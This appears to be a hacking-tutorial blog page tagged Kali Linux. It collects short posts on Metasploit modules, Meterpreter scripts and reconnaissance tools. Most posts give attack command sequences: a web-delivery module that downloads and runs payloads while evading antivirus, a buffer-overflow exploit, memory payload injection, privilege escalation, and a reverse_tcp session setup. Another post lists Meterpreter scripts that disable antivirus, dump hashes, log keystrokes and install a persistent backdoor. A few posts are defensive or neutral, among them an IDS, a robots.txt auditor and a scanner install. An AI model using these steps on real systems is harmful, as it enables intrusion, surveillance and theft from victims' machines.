Showing posts with label Kali Linux. Show all posts

Monday, 24 October 2016

How to Catch Meterpreter Session in your Computer


The tool is called AntiPwny. It's free! Download.





Authors: Rohan Vazarkar, David Bitner

A host based IDS/IPS written in C#, targeted at Metasploit Payloads.
Instructions

AntiPwny requires .NET Framework 4.5, which can be acquired here. An offline installer is available here

Pre-compiled binaries can be found in the exe folder in the root directory. Make sure you use the proper platform or you will get errors! The DLL file included is necessary for AntiPwny to run.

AntiPwny was compiled using Visual Studio 2012 Professional. To compile it yourself, check out the source and compile it against your target platform.

Current Features
  •     Scans Registry for Meterpreter Persistence/MetSvc
  •     Active Memory Scans to detect Meterpreter
  •     IDS/IPS Mode
  •     View outbound connections in compromised processes
  •     Self-Detection for Migrated Meterpreter

Detected Payloads
  •     Meterpreter
  •     Java Meterpreter
  •     Reverse Shell

Friday, 15 January 2016

How to Get Information of Antivirus in Remote Victim PC using Metasploit


Windows Antivirus Exclusions Enumeration

This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.

Module Name

post/windows/gather/enum_av_excluded

msf > use post/windows/gather/enum_av_excluded
msf post(enum_av_excluded) > sessions
            ...sessions...
msf post(enum_av_excluded) > set SESSION <session-id>
msf post(enum_av_excluded) > show options
            ...show and set options...
msf post(enum_av_excluded) > run

Thursday, 14 January 2016

Web Delivery metasploit Script



This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show targets
            ...targets...

msf exploit(web_delivery) > set TARGET <target-id>
msf exploit(web_delivery) > show options
            ...show and set options...
msf exploit(web_delivery) > exploit

   

Saturday, 8 August 2015

Parsero - reads the Robots.txt file of a web server



Parsero is a free script written in Python which reads the robots.txt file of a web server and looks at the Disallow entries. The Disallow entries tell the search engines which directories or files hosted on the web server must not be indexed. For example, "Disallow: /portal/login" means that the content at www.example.com/portal/login is not allowed to be indexed by crawlers like Google, Bing, Yahoo… This is how administrators avoid sharing sensitive or private information with the search engines.

But sometimes the paths listed in the Disallow entries are directly accessible to users without a search engine, just by visiting the URL and the path, and sometimes they cannot be visited by anybody… Because it is really common for administrators to write a lot of Disallow entries, some of which are available and some of which are not, you can use Parsero to check the HTTP status code of each Disallow entry and so find out automatically whether these directories are available or not.

Also, the fact that an administrator writes a robots.txt does not mean that the files or directories listed in the Disallow entries will not be indexed by Bing, Google, Yahoo… For this reason, Parsero is capable of searching Bing to locate content indexed without the web administrator's authorization. Parsero checks the HTTP status code of each Bing result in the same way.
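The Disallow check described above, as an added example that is not Parsero's own code: it parses the Disallow entries of a robots.txt body and records the HTTP status of each path, so a site owner can audit which paths hidden from crawlers are actually reachable. The robots.txt text and the fake status table are constructed for the example; the fetcher is injectable so it runs offline.

```python
import re
from urllib.parse import urljoin
from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError

DISALLOW_RE = re.compile(r"^\s*disallow\s*:\s*(\S*)", re.IGNORECASE)

def parse_disallow(robots_txt):
    """Return the unique, non-empty Disallow paths in order of appearance."""
    paths = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0]          # strip trailing comments
        m = DISALLOW_RE.match(line)
        if m and m.group(1) and m.group(1) not in paths:
            paths.append(m.group(1))
    return paths

def http_status(url, timeout=5):
    """Live fetcher: GET the URL and return its status code (None on network error)."""
    try:
        req = Request(url, headers={"User-Agent": "robots-audit/1.0"})
        with urlopen(req, timeout=timeout) as resp:
            return resp.getcode()
    except HTTPError as err:
        return err.code
    except URLError:
        return None

def audit(base_url, robots_txt, fetch=http_status):
    """Map each Disallow path to its HTTP status; wildcard patterns are not concrete URLs."""
    results = {}
    for path in parse_disallow(robots_txt):
        if "*" in path or "$" in path:
            results[path] = "pattern"
            continue
        results[path] = fetch(urljoin(base_url, path))
    return results

def reachable(results):
    """Paths that answered 200: hidden from crawlers, but anyone can fetch them."""
    return [p for p, s in results.items() if s == 200]

# Constructed sample robots.txt and a fake status table (example data, not a real site).
SAMPLE_ROBOTS = "User-agent: *\nDisallow: /portal/login\nDisallow: /backup/   # old dumps\n" \
                "Disallow: /admin\nDisallow: /private/*.zip\nDisallow:\n"
FAKE_STATUS = {"https://www.example.com/portal/login": 200,
               "https://www.example.com/backup/": 403,
               "https://www.example.com/admin": 404}

if __name__ == "__main__":
    res = audit("https://www.example.com", SAMPLE_ROBOTS, fetch=FAKE_STATUS.get)
    for path, status in res.items():
        print(f"{status!s:>7}  {path}")
    print("reachable:", reachable(res))
```

Replace `fetch=FAKE_STATUS.get` with the default `http_status` to run it against a site you administer.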

Source: https://github.com/behindthefirewalls/Parsero


You can get all the latest info about Parsero from http://www.behindthefirewalls.com/search/?q=parsero

Installing

There are three ways to install Parsero easily.

By using the setup.py script:
sudo setup.py install

By using pip3:
sudo apt-get install python3-pip
sudo pip3 install parsero

In Kali Linux:
sudo apt-get update
sudo apt-get install parsero





Tuesday, 7 April 2015

A-PDF WAV to MP3 v1.0.0 Buffer Overflow



This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.

exploit : exploit/windows/fileformat/a_pdf_wav_to_mp3

msf > use exploit/windows/fileformat/a_pdf_wav_to_mp3
msf exploit(a_pdf_wav_to_mp3) > show targets
...targets...
msf exploit(a_pdf_wav_to_mp3) > set TARGET <target-id>
msf exploit(a_pdf_wav_to_mp3) > show options
...show and set options...
msf exploit(a_pdf_wav_to_mp3) > exploit

Windows Gather Enum User MUICache metasploit module



This module gathers information about the files and file paths that logged-on users have executed on the system. It also checks whether each file still exists on the system. The information is gathered from the MUICache registry key. If the user is logged in when the module is executed, it collects the MUICache entries by accessing the registry directly. If the user is not logged in, the module downloads the user's registry hive (NTUSER.DAT/UsrClass.dat) from the system and parses the MUICache contents from the downloaded hive.

Module : post/windows/gather/enum_muicache

msf > use post/windows/gather/enum_muicache 
msf post(enum_muicache) > sessions
         ...sessions...
msf post(enum_muicache) > set SESSION <session-id>
msf post(enum_muicache) > show options
        ...show and set options...
msf post(enum_muicache) > run

Sunday, 5 April 2015

How to install Nessus Vulnerability Scanner in Ubuntu


Nessus is an open-source network vulnerability scanner that uses the Common Vulnerabilities and Exposures architecture for easy cross-linking between compliant security tools.

Click here to Download Nessus for Ubuntu


Saturday, 4 April 2015

route analysis with 0trace.sh in Kali Linux


0trace.sh is a shell script written by Michal Zalewski. It is a reconnaissance / firewall bypassing tool that enables hop enumeration ("traceroute") within an established TCP connection, such as a HTTP or SMTP session. This is opposed to sending stray packets, as traceroute-type tools usually do. In case of a successful scan, 0trace provides useful additional servers for the penetration tester.


How to install screenlets in ubuntu/linux


Screenlets are small owner-drawn applications (written in Python) that can be described as "the virtual representation of things lying/standing around on your desk". Sticky notes, clocks, rulers, ... the possibilities are endless.
The goal of the Screenlets base-classes is to simplify the creation of fully themable mini-apps that each solve basic desktop-work-related needs and generally improve the usability and eye-candy of the modern composited Linux-desktop.
Features:
  • Real applications, no HTML-"widgets"
  • Easy to use, easy to develop
  • Full compositing support
  • Works with any composited X desktop (compiz, xfce4, ...)
  • Works also on non-composited desktop
  • Included ability to apply themes (SVG, PNG or mixed)
  • Fully scalable when using SVGs
  • Embedded drag&drop-support
  • Automated storing of options (using ini or GConf)
  • Controllable through customizable D-Bus service
  • Can be used together with compiz' widget-plugin to create a Dashboard-like feature as seen on OS X
  • Uses Cairo and GTK2 for drawing and windowing



How to run screenlets as root in ubuntu/linux

Wednesday, 1 April 2015

Reflective DLL Injection Metasploit Module



Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.

Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable.

Download : Reflective DLL Injection Exploit

Tuesday, 31 March 2015

Windows Manage Memory Payload Injection



This module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.

Exploit : exploit/windows/local/payload_inject


Saturday, 28 March 2015

Windows SYSTEM Escalation via KiTrap0D


This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated, the exploit will not run. The module relies on kitrap0d.x86.dll and is not supported on x64 editions of Windows.

exploit : exploit/windows/local/ms10_015_kitrap0d

Targets : Windows 2K SP4 - Windows 7 (x86)



Win32k.sys elevation of privilege vulnerability

win32k.sys, the kernel-mode driver in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1, allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."

Vulnerable systems : Windows XP SP3, Windows 2003 SP2, Windows 7 SP1, Windows 2008 32-bit and Windows 2008 R2 SP1 64-bit

Click Here to Get exploit


Tuesday, 12 August 2014

WebSploit Framework : java applet attack



WebSploit is an open source project for:

  • Social Engineering Works
  • Scan, Crawler & Analysis Web
  • Automatic Exploiter
  • Support Network Attacks
  • Autopwn - used from Metasploit to scan and exploit target services
  • wmap - scan and crawl targets using the Metasploit wmap plugin
  • format infector - inject reverse & bind payloads into file formats
  • phpmyadmin Scanner
  • CloudFlare resolver
  • LFI Bypasser
  • Apache Users Scanner
  • Dir Bruter
  • admin finder
  • MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
  • MITM - Man In The Middle Attack
  • Java Applet Attack
  • MFOD Attack Vector
  • USB Infection Attack
  • ARP DoS Attack
  • Web Killer Attack
  • Fake Update Attack
  • Fake Access Point Attack
  • Wifi Honeypot
  • Wifi Jammer
  • Wifi DoS
  • Bluetooth POD Attack

The Java Applet Attack is considered one of the most successful and popular methods for compromising a system. It is popular because the infected Java applet can be created very easily, and any site can be cloned so that it loads the applet very fast.

The Java applet Attack vector affects:

  • Windows Systems
  • Linux Systems and
  • Mac OS X 

Click here to Download WebSploit Framework 

Saturday, 19 July 2014

Xprobe2 - active OS fingerprinting tool


Xprobe2 is used to perform OS fingerprinting on a remote target.

Download Xprobe2

Installation (BackTrack and Kali Linux have it built in)

You will need libpcap:

$ sudo apt-get install libpcap0.8-dev

You will also need g++-4.1

$ sudo apt-get install g++-4.1

Install Xprobe2

$ wget http://downloads.sourceforge.net/project/xprobe/xprobe2/Xprobe2%200.3/xprobe2-0.3.tar.gz
$ tar xzvf xprobe2-0.3.tar.gz
$ cd xprobe2-0.3/
$ ./configure CC=gcc-4.1 CXX=g++-4.1
$ make
$ sudo make install

Options

-v
Be verbose

-r
Show route to target(traceroute-like output)

-p <proto:portnum:state>
Specify portnumber (1-65535), protocol (tcp|udp) and state (closed|open).
Example: tcp:25:open, UDP:55:CLOSED

-c <configfile>
Specify config file to use.

-h
Print this help.

-o <fname>
Use logfile to log everything.

-t <time_sec>
Set receive timeout to receive_timeout in seconds
(default: 10 seconds)

-s <send_delay>
Set packet sending delay (milliseconds).

-d <debuglv>
Specify debugging level.

-D <modnum>
Disable module number <modnum>.

-M <modnum>
Enable module number <modnum>.

-L
Display modules.

-m <numofmatches>
Specify number of matches to print.

-T <portspec>
Enable TCP portscan for specified port(s).
Example: -T21-23,25,53

-U <portspec>
Enable UDP portscan for specified port(s).

-f
Force fixed round-trip time (-t opt).

-F
Generate signature (use -o to save to a file).

-X
Generate XML output and save it to logfile specified with -o.

-B
Force the TCP handshake module to try to guess an open TCP port.

-A
Perform analysis of sample packets gathered during portscan in order to detect suspicious traffic (i.e. transparent proxies, firewalls/NIDSs resetting connections).
Use with -T.

Monday, 14 July 2014

Nmap Firewalk Script


It is useful for discovering firewall rules using an IP TTL expiration technique known as firewalking.

Example Usage

nmap --script=firewalk --traceroute <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1 <host>
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-probed-ports=7 <host>

Download : Nmap Firewalk Script


Sunday, 13 July 2014

Best Meterpreter Script



getcountermeasure

Getcountermeasure is an automated script that disables security measures such as antivirus, firewall, and more.

Command : run getcountermeasure


winenum

The winenum script is used to dump tokens, hashes and more.

Command : run winenum

getgui

The getgui script is used to enable RDP on a target system.

Command : run getgui -e


killav

Killav is used to disable most antivirus programs.

Command : run killav

gettelnet

The gettelnet script is used to enable telnet on the victim.

Command : run gettelnet -e

hostedit

The hostedit Meterpreter script is used to edit the Windows hosts file.

Command : run hostedit

checkvm

Checkvm is used to see whether the machine you exploited is a virtual machine.

Command : run checkvm

screenspy

screenspy is used to take a screenshot of the remote PC.

Command : run screenspy

keylogrecorder

keylogrecorder is used to start a keylogger on the victim PC.

Command : run keylogrecorder

metsvc

metsvc is used to create a persistent backdoor.

Friday, 11 July 2014

How to get MUICache Entries in Remote Windows Machine


According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

use post/windows/gather/enum_muicache

msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (enum_muicache)>set session 2

msf exploit (enum_muicache)>exploit